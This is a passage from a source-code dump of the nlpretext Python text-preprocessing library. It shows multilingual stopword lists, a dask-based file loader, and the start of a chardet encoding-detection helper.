        "เนื่องจาก",
        "เปิด",
        "เปิดเผย",
        "เป็น",
        "เป็นการ",
        "เพราะ",
        "เพื่อ",
        "เมื่อ",
        "เรา",
        "เริ่ม",
        "เลย",
        "เห็น",
        "เอง",
        "แต่",
        "แบบ",
        "แรก",
        "และ",
        "แล้ว",
        "แห่ง",
        "โดย",
        "ใน",
        "ให้",
        "ได้",
        "ไป",
        "ไม่",
        "ไว้",
    ],
    "ar": [
        "،",
        "أ",
        "ا",
        "اثر",
        "اجل",
        "احد",
        "اخرى",
        "اذا",
        "اربعة",
        "اطار",
        "اعادة",
        "اعلنت",
        "اف",
        "اكثر",
        "اكد",
        "الا",
        "الاخيرة",
        "الان",
        "الاول",
        "الاولى",
        "التى",
        "التي",
        "الثاني",
        "الثانية",
        "الذاتي",
        "الذى",
        "الذي",
        "الذين",
        "السابق",
        "الف",
        "الماضي",
        "المقبل",
        "الوقت",
        "الى",
        "اليوم",
        "اما",
        "امام",
        "امس",
        "ان",
        "انه",
        "انها",
        "او",
        "اول",
        "اي",
        "ايار",
        "ايام",
        "ايضا",
        "ب",
        "باسم",
        "بان",
        "برس",
        "بسبب",
        "بشكل",
        "بعد",
        "بعض",
        "بن",
        "به",
        "بها",
        "بين",
        "تم",
        "ثلاثة",
        "ثم",
        "جميع",
        "حاليا",
        "حتى",
        "حوالى",
        "حول",
        "حيث",
        "حين",
        "خلال",
        "دون",
        "ذلك",
        "زيارة",
        "سنة",
        "سنوات",
        "شخصا",
        "صباح",
        "صفر",
        "ضد",
        "ضمن",
        "عام",
        "عاما",
        "عدة",
        "عدد",
        "عدم",
        "عشر",
        "عشرة",
        "على",
        "عليه",
        "عليها",
        "عن",
        "عند",
        "عندما",
        "غدا",
        "غير",
        "ـ",
        "ف",
        "فان",
        "فى",
        "في",
        "فيه",
        "فيها",
        "قال",
        "قبل",
        "قد",
        "قوة",
        "كان",
        "كانت",
        "كل",
        "كلم",
        "كما",
        "لا",
        "لدى",
        "لقاء",
        "لكن",
        "للامم",
        "لم",
        "لن",
        "له",
        "لها",
        "لوكالة",
        "ما",
        "مايو",
        "مساء",
        "مع",
        "مقابل",
        "مليار",
        "مليون",
        "من",
        "منذ",
        "منها",
        "نحو",
        "نفسه",
        "نهاية",
        "هذا",
        "هذه",
        "هناك",
        "هو",
        "هي",
        "و",
        "و6",
        "واحد",
        "واضاف",
        "واضافت",
        "واكد",
        "وان",
        "واوضح",
        "وفي",
        "وقال",
        "وقالت",
        "وقد",
        "وقف",
        "وكان",
        "وكانت",
        "ولا",
        "ولم",
        "ومن",
        "وهو",
        "وهي",
        "يكون",
        "يمكن",
        "يوم",
    ],
    "bg": [
        "а",
        "автентичен",
        "аз",
        "ако",
        "ала",
        "бе",
        "без",
        "беше",
        "би",
        "бивш",
        "бивша",
        "бившо",
        "бил",
        "била",
        "били",
        "било",
        "благодаря",
        "близо",
        "бъдат",
        "бъде",
        "бяха",
        "в",
        "вас",
        "ваш",
        "ваша",
        "вероятно",
        "вече",
        "взема",
        "ви",
        "вие",
        "винаги",
        "внимава",
        "време",
        "все",
        "всеки",
        "всички",
        "всичко",
        "всяка",
        "във",
        "въпреки",
        "върху",
        "г",
        "ги",
        "главен",
        "главна",
        "главно",
        "глас",
        "го",
        "година",
        "години",
        "годишен",
        "д",
        "да",
        "дали",
        "два",
        "двама",
        "двамата",
        "две",
        "двете",
        "ден",
        "днес",
        "дни",
        "до",
        "добра",
        "добре",
        "добро",
        "добър",
        "докато",
        "докога",
        "дори",
        "досега",
        "доста",
        "друг",
        "друга",
        "други",
        "е",
        "евтин",
        "едва",
        "един",
        "една",
        "еднаква",
        "еднакви",
        "еднакъв",
        "едно",
        "екип",
        "ето",
        "живот",
        "за",
        "забавям",
        "зад",
        "заедно",
        "заради",
        "засега",
        "заспал",
        "затова",
        "защо",
        "защото",
        "и",
        "из",
        "или",
        "им",
        "има",
        "имат",
        "иска",
        "й",
        "каза",
        "как",
        "каква",
        "какво",
        "както",
        "какъв",
        "като",
        "кога",
        "когато",
        "което",
        "които",
        "кой",
        "който",
        "колко",
        "която",
        "къде",
        "където",
        "към",
        "лесен",
        "лесно",
        "ли",
        "лош",
        "м",
        "май",
        "малко",
        "ме",
        "между",
        "мек",
        "мен",
        "месец",
        "ми",
        "много",
        "мнозина",
        "мога",
        "могат",
        "може",
        "мокър",
        "моля",
        "момента",
        "му",
        "н",
        "на",
        "над",
        "назад",
        "най",
        "направи",
        "напред",
        "например",
        "нас",
        "не",
        "него",
        "нещо",
        "нея",
        "ни",
        "ние",
        "никой",
        "нито",
        "нищо",
        "но",
        "нов",
        "нова",
        "нови",
        "новина",
        "някои",
        "някой",
        "няколко",
        "няма",
        "обаче",
        "около",
        "освен",
        "особено",
        "от",
        "отгоре",
        "отново",
        "още",
        "пак",
        "по",
        "повече",
        "повечето",
        "под",
        "поне",
        "поради",
        "после",
        "почти",
        "прави",
        "пред",
        "преди",
        "през",
        "при",
        "пък",
        "първата",
        "първи",
        "първо",
        "пъти",
        "равен",
        "равна",
        "с",
        "са",
        "сам",
        "само",
        "се",
        "сега",
        "си",
        "син",
        "скоро",
        "след",
        "следващ",
        "сме",
        "смях",
        "според",
        "сред",
        "срещу",
        "сте",
        "съм",
        "със",
        "също",
        "т",
        "т.н.",
        "тази",
        "така",
        "такива",
        "такъв",
        "там",
        "твой",
        "те",
        "тези",
        "ти",
        "то",
        "това",
        "тогава",
        "този",
        "той",
        "толкова",
        "точно",
        "три",
        "трябва",
        "тук",
        "тъй",
        "тя",
        "тях",
        "у",
        "утре",
        "харесва",
        "хиляди",
        "ч",
        "часа",
        "че",
        "често",
        "чрез",
        "ще",
        "щом",
        "юмрук",
        "я",
        "як",
    ],
    "bn": [
        "অনেক",
        "অন্য",
        "অবশ্য",
        "আগে",
        "আছে",
        "আজ",
        "আবার",
        "আমরা",
        "আমাদের",
        "আর",
        "ই",
        "উত্তর",
        "উপর",
        "উপরে",
        "এ",
        "এই",
        "এক্",
        "এখন",
        "এত",
        "এব",
        "এমন",
        "এমনি",
        "এর",
        "এস",
        "এসে",
        "ও",
        "ওই",
        "কমনে",
        "করা",
        "করে",
        "কাছে",
        "কাজ",
        "কাজে",
        "কারণ",
        "কি",
        "কিছু",
        "কে",
        "কেউ",
        "কেখা",
        "কেন",
        "কোটি",
        "কোনো",
        "কয়েক",
        "খুব",
        "গিয়ে",
        "গেল",
        "চার",
        "চালু",
        "চেষ্টা",
        "ছিল",
        "জানা",
        "জ্নজন",
        "টি",
        "তখন",
        "তবে",
        "তা",
        "তাই",
        "তো",
        "থাকা",
        "থেকে",
        "দিন",
        "দু",
        "দুই",
        "দেওয়া",
        "ধামার",
        "নতুন",
        "না",
        "নাগাদ",
        "নিয়ে",
        "নেওয়া",
        "নয়",
        "পর",
        "পরে",
        "পাচ",
        "পি",
        "পেয়্র্",
        "প্রতি",
        "প্রথম",
        "প্রযন্ত",
        "প্রাথমিক",
        "প্রায়",
        "বক্তব্য",
        "বন",
        "বলা",
        "বলে",
        "বলেন",
        "বহু",
        "বা",
        "বি",
        "বিভিন্ন",
        "বেশ",
        "বেশি",
        "মতো",
        "মধ্যে",
        "মনে",
        "যখন",
        "যদি",
        "যা",
        "যাওয়া",
        "যে",
        "র",
        "রকম",
        "লক্ষ",
        "শুধু",
        "শুরু",
        "সঙ্গে",
        "সব",
        "সহ",
        "সাধারণ",
        "সামনে",
        "সি",
        "সে",
        "সেই",
        "হতে",
        "হাজার",
        "হয়",
    ],
    "fa": [
        "آباد",
        "آره",
        "آری",
        "آمد",
        "آمده",
        "آن",
        "آنان",
        "آنجا",
        "آنكه",
        "آنها",
        "آنچه",
        "آورد",
        "آورده",
        "آيد",
        "آیا",
        "اثرِ",
        "از",
        "است",
        "استفاده",
        "اش",
        "اكنون",
        "البته",
        "البتّه",
        "ام",
        "اما",
        "امروز",
        "امسال",
        "اند",
        "انکه",
        "او",
        "اول",
        "اي",
        "ايشان",
        "ايم",
        "اين",
        "اينكه",
        "اگر",
        "با",
        "بار",
        "بارة",
        "باره",
        "باشد",
        "باشند",
        "باشيم",
        "بالا",
        "بالایِ",
        "بايد",
        "بدون",
        "بر",
        "برابرِ",
        "براساس",
        "براي",
        "برایِ",
        "برخوردار",
        "برخي",
        "برداري",
        "بروز",
        "بسيار",
        "بسياري",
        "بعد",
        "بعری",
        "بعضي",
        "بلكه",
        "بله",
        "بلکه",
        "بلی",
        "بنابراين",
        "بندي",
        "به",
        "بهترين",
        "بود",
        "بودن",
        "بودند",
        "بوده",
        "بي",
        "بيست",
        "بيش",
        "بيشتر",
        "بيشتري",
        "بين",
        "بی",
        "بیرونِ",
        "تا",
        "تازه",
        "تاكنون",
        "تان",
        "تحت",
        "تر",
        "ترين",
        "تمام",
        "تمامي",
        "تنها",
        "تواند",
        "توانند",
        "توسط",
        "تولِ",
        "تویِ",
        "جا",
        "جاي",
        "جايي",
        "جدا",
        "جديد",
        "جريان",
        "جز",
        "جلوگيري",
        "جلویِ",
        "حتي",
        "حدودِ",
        "حق",
        "خارجِ",
        "خدمات",
        "خواست",
        "خواهد",
        "خواهند",
        "خواهيم",
        "خود",
        "خويش",
        "خیاه",
        "داد",
        "دادن",
        "دادند",
        "داده",
        "دارد",
        "دارند",
        "داريم",
        "داشت",
        "داشتن",
        "داشتند",
        "داشته",
        "دانست",
        "دانند",
        "در",
        "درباره",
        "دنبالِ",
        "ده",
        "دهد",
        "دهند",
        "دو",
        "دوم",
        "ديده",
        "ديروز",
        "ديگر",
        "ديگران",
        "ديگري",
        "دیگر",
        "را",
        "راه",
        "رفت",
        "رفته",
        "روب",
        "روزهاي",
        "روي",
        "رویِ",
        "ريزي",
        "زياد",
        "زير",
        "زيرا",
        "زیرِ",
        "سابق",
        "ساخته",
        "سازي",
        "سراسر",
        "سریِ",
        "سعي",
        "سمتِ",
        "سوم",
        "سوي",
        "سویِ",
        "سپس",
        "شان",
        "شايد",
        "شد",
        "شدن",
        "شدند",
        "شده",
        "شش",
        "شما",
        "شناسي",
        "شود",
        "شوند",
        "صورت",
        "ضدِّ",
        "ضمن",
        "طبقِ",
        "طريق",
        "طور",
        "طي",
        "عقبِ",
        "علّتِ",
        "عنوانِ",
        "غير",
        "فقط",
        "فكر",
        "فوق",
        "قابل",
        "قبل",
        "قصدِ",
        "كرد",
        "كردم",
        "كردن",
        "كردند",
        "كرده",
        "كسي",
        "كل",
        "كمتر",
        "كند",
        "كنم",
        "كنند",
        "كنيد",
        "كنيم",
        "كه",
        "لطفاً",
        "ما",
        "مان",
        "مانند",
        "مانندِ",
        "مثل",
        "مثلِ",
        "مختلف",
        "مدّتی",
        "مردم",
        "مرسی",
        "مقابل",
        "من",
        "مورد",
        "مي",
        "ميليارد",
        "ميليون",
        "مگر",
        "ناشي",
        "نام",
        "نبايد",
        "نبود",
        "نخست",
        "نخستين",
        "نخواهد",
        "ندارد",
        "ندارند",
        "نداشته",
        "نزديك",
        "نزدِ",
        "نزدیکِ",
        "نشان",
        "نشده",
        "نظير",
        "نكرده",
        "نمايد",
        "نمي",
        "نه",
        "نوعي",
        "نيز",
        "نيست",
        "ها",
        "هاي",
        "هايي",
        "هر",
        "هرگز",
        "هزار",
        "هست",
        "هستند",
        "هستيم",
        "هفت",
        "هم",
        "همان",
        "همه",
        "همواره",
        "همين",
        "همچنان",
        "همچنين",
        "همچون",
        "همین",
        "هنوز",
        "هنگام",
        "هنگامِ",
        "هنگامی",
        "هيچ",
        "هیچ",
        "و",
        "وسطِ",
        "وقتي",
        "وقتیکه",
        "ولی",
        "وي",
        "وگو",
        "يا",
        "يابد",
        "يك",
        "يكديگر",
        "يكي",
        "ّه",
        "پاعینِ",
        "پس",
        "پنج",
        "پيش",
        "پیش",
        "پیشِ",
        "چرا",
        "چطور",
        "چند",
        "چندین",
        "چنين",
        "چه",
        "چهار",
        "چون",
        "چيزي",
        "چگونه",
        "چیز",
        "چیزی",
        "چیست",
        "کجا",
        "کجاست",
        "کدام",
        "کس",
        "کسی",
        "کنارِ",
        "که",
        "کَی",
        "کی",
        "گذاري",
        "گذاشته",
        "گردد",
        "گرفت",
        "گرفته",
        "گروهي",
        "گفت",
        "گفته",
        "گويد",
        "گويند",
        "گيرد",
        "گيري",
        "یا",
        "یک",
    ],
    "hi": [
        "अंदर",
        "अत",
        "अदि",
        "अप",
        "अपना",
        "अपनि",
        "अपनी",
        "अपने",
        "अभि",
        "अभी",
        "आदि",
        "आप",
        "इंहिं",
        "इंहें",
        "इंहों",
        "इतयादि",
        "इत्यादि",
        "इन",
        "इनका",
        "इन्हीं",
        "इन्हें",
        "इन्हों",
        "इस",
        "इसका",
        "इसकि",
        "इसकी",
        "इसके",
        "इसमें",
        "इसि",
        "इसी",
        "इसे",
        "उंहिं",
        "उंहें",
        "उंहों",
        "उन",
        "उनका",
        "उनकि",
        "उनकी",
        "उनके",
        "उनको",
        "उन्हीं",
        "उन्हें",
        "उन्हों",
        "उस",
        "उसके",
        "उसि",
        "उसी",
        "उसे",
        "एक",
        "एवं",
        "एस",
        "एसे",
        "ऐसे",
        "ओर",
        "और",
        "कइ",
        "कई",
        "कर",
        "करता",
        "करते",
        "करना",
        "करने",
        "करें",
        "कहते",
        "कहा",
        "का",
        "काफि",
        "काफ़ी",
        "कि",
        "किंहें",
        "किंहों",
        "कितना",
        "किन्हें",
        "किन्हों",
        "किया",
        "किर",
        "किस",
        "किसि",
        "किसी",
        "किसे",
        "की",
        "कुछ",
        "कुल",
        "के",
        "को",
        "कोइ",
        "कोई",
        "कोन",
        "कोनसा",
        "कौन",
        "कौनसा",
        "गया",
        "घर",
        "जब",
        "जहाँ",
        "जहां",
        "जा",
        "जिंहें",
        "जिंहों",
        "जितना",
        "जिधर",
        "जिन",
        "जिन्हें",
        "जिन्हों",
        "जिस",
        "जिसे",
        "जीधर",
        "जेसा",
        "जेसे",
        "जैसा",
        "जैसे",
        "जो",
        "तक",
        "तब",
        "तरह",
        "तिंहें",
        "तिंहों",
        "तिन",
        "तिन्हें",
        "तिन्हों",
        "तिस",
        "तिसे",
        "तो",
        "था",
        "थि",
        "थी",
        "थे",
        "दबारा",
        "दवारा",
        "दिया",
        "दुसरा",
        "दुसरे",
        "दूसरे",
        "दो",
        "द्वारा",
        "न",
        "नहिं",
        "नहीं",
        "ना",
        "निचे",
        "निहायत",
        "नीचे",
        "ने",
        "पर",
        "पहले",
        "पुरा",
        "पूरा",
        "पे",
        "फिर",
        "बनि",
        "बनी",
        "बहि",
        "बही",
        "बहुत",
        "बाद",
        "बाला",
        "बिलकुल",
        "भि",
        "भितर",
        "भी",
        "भीतर",
        "मगर",
        "मानो",
        "मे",
        "में",
        "यदि",
        "यह",
        "यहाँ",
        "यहां",
        "यहि",
        "यही",
        "या",
        "यिह",
        "ये",
        "रखें",
        "रवासा",
        "रहा",
        "रहे",
        "ऱ्वासा",
        "लिए",
        "लिये",
        "लेकिन",
        "व",
        "वगेरह",
        "वरग",
        "वर्ग",
        "वह",
        "वहाँ",
        "वहां",
        "वहिं",
        "वहीं",
        "वाले",
        "वुह",
        "वे",
        "वग़ैरह",
        "संग",
        "सकता",
        "सकते",
        "सबसे",
        "सभि",
        "सभी",
        "साथ",
        "साबुत",
        "साभ",
        "सारा",
        "से",
        "सो",
        "हि",
        "ही",
        "हुअ",
        "हुआ",
        "हुइ",
        "हुई",
        "हुए",
        "हे",
        "हें",
        "है",
        "हैं",
        "हो",
        "होता",
        "होति",
        "होती",
        "होते",
        "होना",
        "होने",
    ],
    "mr": [
        "अधिक",
        "अनेक",
        "अशी",
        "असलयाचे",
        "असलेल्या",
        "असा",
        "असून",
        "असे",
        "आज",
        "आणि",
        "आता",
        "आपल्या",
        "आला",
        "आली",
        "आले",
        "आहे",
        "आहेत",
        "एक",
        "एका",
        "कमी",
        "करणयात",
        "करून",
        "का",
        "काम",
        "काय",
        "काही",
        "किवा",
        "की",
        "केला",
        "केली",
        "केले",
        "कोटी",
        "गेल्या",
        "घेऊन",
        "जात",
        "झाला",
        "झाली",
        "झाले",
        "झालेल्या",
        "टा",
        "डॉ",
        "तर",
        "तरी",
        "तसेच",
        "ता",
        "ती",
        "तीन",
        "ते",
        "तो",
        "त्या",
        "त्याचा",
        "त्याची",
        "त्याच्या",
        "त्याना",
        "त्यानी",
        "त्यामुळे",
        "त्री",
        "दिली",
        "दोन",
        "न",
        "नाही",
        "निर्ण्य",
        "पण",
        "पम",
        "परयतन",
        "पाटील",
        "म",
        "मात्र",
        "माहिती",
        "मी",
        "मुबी",
        "म्हणजे",
        "म्हणाले",
        "म्हणून",
        "या",
        "याचा",
        "याची",
        "याच्या",
        "याना",
        "यानी",
        "येणार",
        "येत",
        "येथील",
        "येथे",
        "लाख",
        "व",
        "व्यकत",
        "सर्व",
        "सागित्ले",
        "सुरू",
        "हजार",
        "हा",
        "ही",
        "हे",
        "होणार",
        "होत",
        "होता",
        "होती",
        "होते",
    ],
    "ro": [
        "acea",
        "aceasta",
        "această",
        "aceea",
        "acei",
        "aceia",
        "acel",
        "acela",
        "acele",
        "acelea",
        "acest",
        "acesta",
        "aceste",
        "acestea",
        "aceşti",
        "aceştia",
        "acolo",
        "acord",
        "acum",
        "ai",
        "aia",
        "aibă",
        "aici",
        "al",
        "ale",
        "alea",
        "altceva",
        "altcineva",
        "am",
        "ar",
        "are",
        "asemenea",
        "asta",
        "astea",
        "astăzi",
        "asupra",
        "au",
        "avea",
        "avem",
        "aveţi",
        "azi",
        "aş",
        "aşadar",
        "aţi",
        "bine",
        "bucur",
        "bună",
        "ca",
        "care",
        "caut",
        "ce",
        "cel",
        "ceva",
        "chiar",
        "cinci",
        "cine",
        "cineva",
        "contra",
        "cu",
        "cum",
        "cumva",
        "curând",
        "curînd",
        "când",
        "cât",
        "câte",
        "câtva",
        "câţi",
        "cînd",
        "cît",
        "cîte",
        "cîtva",
        "cîţi",
        "că",
        "căci",
        "cărei",
        "căror",
        "cărui",
        "către",
        "da",
        "dacă",
        "dar",
        "datorită",
        "dată",
        "dau",
        "de",
        "deci",
        "deja",
        "deoarece",
        "departe",
        "deşi",
        "din",
        "dinaintea",
        "dintr-",
        "dintre",
        "doi",
        "doilea",
        "două",
        "drept",
        "după",
        "dă",
        "ea",
        "ei",
        "el",
        "ele",
        "eram",
        "este",
        "eu",
        "eşti",
        "face",
        "fata",
        "fi",
        "fie",
        "fiecare",
        "fii",
        "fim",
        "fiu",
        "fiţi",
        "frumos",
        "fără",
        "graţie",
        "halbă",
        "iar",
        "ieri",
        "la",
        "le",
        "li",
        "lor",
        "lui",
        "lângă",
        "lîngă",
        "mai",
        "mea",
        "mei",
        "mele",
        "mereu",
        "meu",
        "mi",
        "mie",
        "mine",
        "mult",
        "multă",
        "mulţi",
        "mulţumesc",
        "mâine",
        "mîine",
        "mă",
        "ne",
        "nevoie",
        "nici",
        "nicăieri",
        "nimeni",
        "nimeri",
        "nimic",
        "nişte",
        "noastre",
        "noastră",
        "noi",
        "noroc",
        "nostru",
        "nouă",
        "noştri",
        "nu",
        "opt",
        "ori",
        "oricare",
        "orice",
        "oricine",
        "oricum",
        "oricând",
        "oricât",
        "oricînd",
        "oricît",
        "oriunde",
        "patra",
        "patru",
        "patrulea",
        "pe",
        "pentru",
        "peste",
        "pic",
        "poate",
        "pot",
        "prea",
        "prima",
        "primul",
        "prin",
        "printr-",
        "puţin",
        "puţina",
        "puţină",
        "până",
        "pînă",
        "rog",
        "sa",
        "sale",
        "sau",
        "se",
        "spate",
        "spre",
        "sub",
        "sunt",
        "suntem",
        "sunteţi",
        "sută",
        "sînt",
        "sîntem",
        "sînteţi",
        "să",
        "săi",
        "său",
        "ta",
        "tale",
        "te",
        "timp",
        "tine",
        "toate",
        "toată",
        "tot",
        "totuşi",
        "toţi",
        "trei",
        "treia",
        "treilea",
        "tu",
        "tăi",
        "tău",
        "un",
        "una",
        "unde",
        "undeva",
        "unei",
        "uneia",
        "unele",
        "uneori",
        "unii",
        "unor",
        "unora",
        "unu",
        "unui",
        "unuia",
        "unul",
        "vi",
        "voastre",
        "voastră",
        "voi",
        "vostru",
        "vouă",
        "voştri",
        "vreme",
        "vreo",
        "vreun",
        "vă",
        "zece",
        "zero",
        "zi",
        "zice",
        "îi",
        "îl",
        "îmi",
        "împotriva",
        "în",
        "înainte",
        "înaintea",
        "încotro",
        "încât",
        "încît",
        "între",
        "întrucât",
        "întrucît",
        "îţi",
        "ăla",
        "ălea",
        "ăsta",
        "ăstea",
        "ăştia",
        "şapte",
        "şase",
        "şi",
        "ştiu",
        "ţi",
        "ţie",
    ],
    "en": [
        "a",
        "a's",
        "able",
        "about",
        "above",
        "according",
        "accordingly",
        "across",
        "actually",
        "after",
        "afterwards",
        "again",
        "against",
        "ain't",
        "all",
        "allow",
        "allows",
        "almost",
        "alone",
        "along",
        "already",
        "also",
        "although",
        "always",
        "am",
        "among",
        "amongst",
        "an",
        "and",
        "another",
        "any",
        "anybody",
        "anyhow",
        "anyone",
        "anything",
        "anyway",
        "anyways",
        "anywhere",
        "apart",
        "appear",
        "appreciate",
        "appropriate",
        "are",
        "aren't",
        "around",
        "as",
        "aside",
        "ask",
        "asking",
        "associated",
        "at",
        "available",
        "away",
        "awfully",
        "b",
        "be",
        "became",
        "because",
        "become",
        "becomes",
        "becoming",
        "been",
        "before",
        "beforehand",
        "behind",
        "being",
        "believe",
        "below",
        "beside",
        "besides",
        "best",
        "better",
        "between",
        "beyond",
        "both",
        "brief",
        "but",
        "by",
        "c",
        "c'mon",
        "c's",
        "came",
        "can",
        "can't",
        "cannot",
        "cant",
        "cause",
        "causes",
        "certain",
        "certainly",
        "changes",
        "clearly",
        "co",
        "com",
        "come",
        "comes",
        "concerning",
        "consequently",
        "consider",
        "considering",
        "contain",
        "containing",
        "contains",
        "corresponding",
        "could",
        "couldn't",
        "course",
        "currently",
        "d",
        "definitely",
        "described",
        "despite",
        "did",
        "didn't",
        "different",
        "do",
        "does",
        "doesn't",
        "doing",
        "don't",
        "done",
        "down",
        "downwards",
        "during",
        "e",
        "each",
        "edu",
        "eg",
        "eight",
        "either",
        "else",
        "elsewhere",
        "enough",
        "entirely",
        "especially",
        "et",
        "etc",
        "even",
        "ever",
        "every",
        "everybody",
        "everyone",
        "everything",
        "everywhere",
        "ex",
        "exactly",
        "example",
        "except",
        "f",
        "far",
        "few",
        "fifth",
        "first",
        "five",
        "followed",
        "following",
        "follows",
        "for",
        "former",
        "formerly",
        "forth",
        "four",
        "from",
        "further",
        "furthermore",
        "g",
        "get",
        "gets",
        "getting",
        "given",
        "gives",
        "go",
        "goes",
        "going",
        "gone",
        "got",
        "gotten",
        "greetings",
        "h",
        "had",
        "hadn't",
        "happens",
        "hardly",
        "has",
        "hasn't",
        "have",
        "haven't",
        "having",
        "he",
        "he's",
        "hello",
        "help",
        "hence",
        "her",
        "here",
        "here's",
        "hereafter",
        "hereby",
        "herein",
        "hereupon",
        "hers",
        "herself",
        "hi",
        "him",
        "himself",
        "his",
        "hither",
        "hopefully",
        "how",
        "howbeit",
        "however",
        "i",
        "i'd",
        "i'll",
        "i'm",
        "i've",
        "ie",
        "if",
        "ignored",
        "immediate",
        "in",
        "inasmuch",
        "inc",
        "indeed",
        "indicate",
        "indicated",
        "indicates",
        "inner",
        "insofar",
        "instead",
        "into",
        "inward",
        "is",
        "isn't",
        "it",
        "it'd",
        "it'll",
        "it's",
        "its",
        "itself",
        "j",
        "just",
        "k",
        "keep",
        "keeps",
        "kept",
        "know",
        "known",
        "knows",
        "l",
        "last",
        "lately",
        "later",
        "latter",
        "latterly",
        "least",
        "less",
        "lest",
        "let",
        "let's",
        "like",
        "liked",
        "likely",
        "little",
        "look",
        "looking",
        "looks",
        "ltd",
        "m",
        "mainly",
        "many",
        "may",
        "maybe",
        "me",
        "mean",
        "meanwhile",
        "merely",
        "might",
        "more",
        "moreover",
        "most",
        "mostly",
        "much",
        "must",
        "my",
        "myself",
        "n",
        "name",
        "namely",
        "nd",
        "near",
        "nearly",
        "necessary",
        "need",
        "needs",
        "neither",
        "never",
        "nevertheless",
        "new",
        "next",
        "nine",
        "no",
        "nobody",
        "non",
        "none",
        "noone",
        "nor",
        "normally",
        "not",
        "nothing",
        "novel",
        "now",
        "nowhere",
        "o",
        "obviously",
        "of",
        "off",
        "often",
        "oh",
        "ok",
        "okay",
        "old",
        "on",
        "once",
        "one",
        "ones",
        "only",
        "onto",
        "or",
        "other",
        "others",
        "otherwise",
        "ought",
        "our",
        "ours",
        "ourselves",
        "out",
        "outside",
        "over",
        "overall",
        "own",
        "p",
        "particular",
        "particularly",
        "per",
        "perhaps",
        "placed",
        "please",
        "plus",
        "possible",
        "presumably",
        "probably",
        "provides",
        "q",
        "que",
        "quite",
        "qv",
        "r",
        "rather",
        "rd",
        "re",
        "really",
        "reasonably",
        "regarding",
        "regardless",
        "regards",
        "relatively",
        "respectively",
        "right",
        "s",
        "said",
        "same",
        "saw",
        "say",
        "saying",
        "says",
        "second",
        "secondly",
        "see",
        "seeing",
        "seem",
        "seemed",
        "seeming",
        "seems",
        "seen",
        "self",
        "selves",
        "sensible",
        "sent",
        "serious",
        "seriously",
        "seven",
        "several",
        "shall",
        "she",
        "should",
        "shouldn't",
        "since",
        "six",
        "so",
        "some",
        "somebody",
        "somehow",
        "someone",
        "something",
        "sometime",
        "sometimes",
        "somewhat",
        "somewhere",
        "soon",
        "sorry",
        "specified",
        "specify",
        "specifying",
        "still",
        "sub",
        "such",
        "sup",
        "sure",
        "t",
        "t's",
        "take",
        "taken",
        "tell",
        "tends",
        "th",
        "than",
        "thank",
        "thanks",
        "thanx",
        "that",
        "that's",
        "thats",
        "the",
        "their",
        "theirs",
        "them",
        "themselves",
        "then",
        "thence",
        "there",
        "there's",
        "thereafter",
        "thereby",
        "therefore",
        "therein",
        "theres",
        "thereupon",
        "these",
        "they",
        "they'd",
        "they'll",
        "they're",
        "they've",
        "think",
        "third",
        "this",
        "thorough",
        "thoroughly",
        "those",
        "though",
        "three",
        "through",
        "throughout",
        "thru",
        "thus",
        "to",
        "together",
        "too",
        "took",
        "toward",
        "towards",
        "tried",
        "tries",
        "truly",
        "try",
        "trying",
        "twice",
        "two",
        "u",
        "un",
        "under",
        "unfortunately",
        "unless",
        "unlikely",
        "until",
        "unto",
        "up",
        "upon",
        "us",
        "use",
        "used",
        "useful",
        "uses",
        "using",
        "usually",
        "uucp",
        "v",
        "value",
        "various",
        "very",
        "via",
        "viz",
        "vs",
        "w",
        "want",
        "wants",
        "was",
        "wasn't",
        "way",
        "we",
        "we'd",
        "we'll",
        "we're",
        "we've",
        "welcome",
        "well",
        "went",
        "were",
        "weren't",
        "what",
        "what's",
        "whatever",
        "when",
        "whence",
        "whenever",
        "where",
        "where's",
        "whereafter",
        "whereas",
        "whereby",
        "wherein",
        "whereupon",
        "wherever",
        "whether",
        "which",
        "while",
        "whither",
        "who",
        "who's",
        "whoever",
        "whole",
        "whom",
        "whose",
        "why",
        "will",
        "willing",
        "wish",
        "with",
        "within",
        "without",
        "won't",
        "wonder",
        "would",
        "wouldn't",
        "x",
        "y",
        "yes",
        "yet",
        "you",
        "you'd",
        "you'll",
        "you're",
        "you've",
        "your",
        "yours",
        "yourself",
        "yourselves",
        "z",
        "zero",
    ],
}


================================================
FILE: nlpretext/_utils/__init__.py
================================================
# GNU Lesser General Public License v3.0 only
# Copyright (C) 2020 Artefact
# licence-information@artefact.com
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 3 of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with this program; if not, write to the Free Software Foundation,
# Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301, USA.


================================================
FILE: nlpretext/_utils/daskloader.py
================================================
# mypy: disable-error-code="attr-defined"
from typing import List, Union

import dask.bag as db
import dask.dataframe as dd


def read_text(files_path: Union[str, List[str]], encoding: str):  # type: ignore
    return db.read_text(files_path, encoding=encoding).str.strip().to_dataframe()


def read_json(files_path: Union[str, List[str]], encoding: str):  # type: ignore
    return dd.read_json(files_path, encoding=encoding)


def read_csv(files_path: Union[str, List[str]], encoding: str):  # type: ignore
    return dd.read_csv(files_path, encoding=encoding)


def read_parquet(files_path: Union[str, List[str]], encoding: str):  # type: ignore
    return dd.read_parquet(files_path, encoding=encoding)


================================================
FILE: nlpretext/_utils/file_loader.py
================================================
# GNU Lesser General Public License v3.0 only
# Copyright (C) 2020 Artefact
# licence-information@artefact.com
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 3 of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with this program; if not, write to the Free Software Foundation,
# Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301, USA.
# mypy: disable-error-code="assignment"

from typing import List, Union

import chardet
from nlpretext._config import constants


def detect_encoding(file_path_or_string: Union[str, bytes], n_lines: int = 100) -> str:
    """
    Predict a file's encoding using chardet.

    Parameters
    ----------
    file_path_or_string : string
        if filepath, will open the file. Otherwise will predict from the string
    n_lines : int
        number of line to predict from

    Returns
    -------
    string
        the code of the detected encoding
    """
    if isinstance(file_path_or_string, bytes):
        rawdata = file_path_or_string
    else:
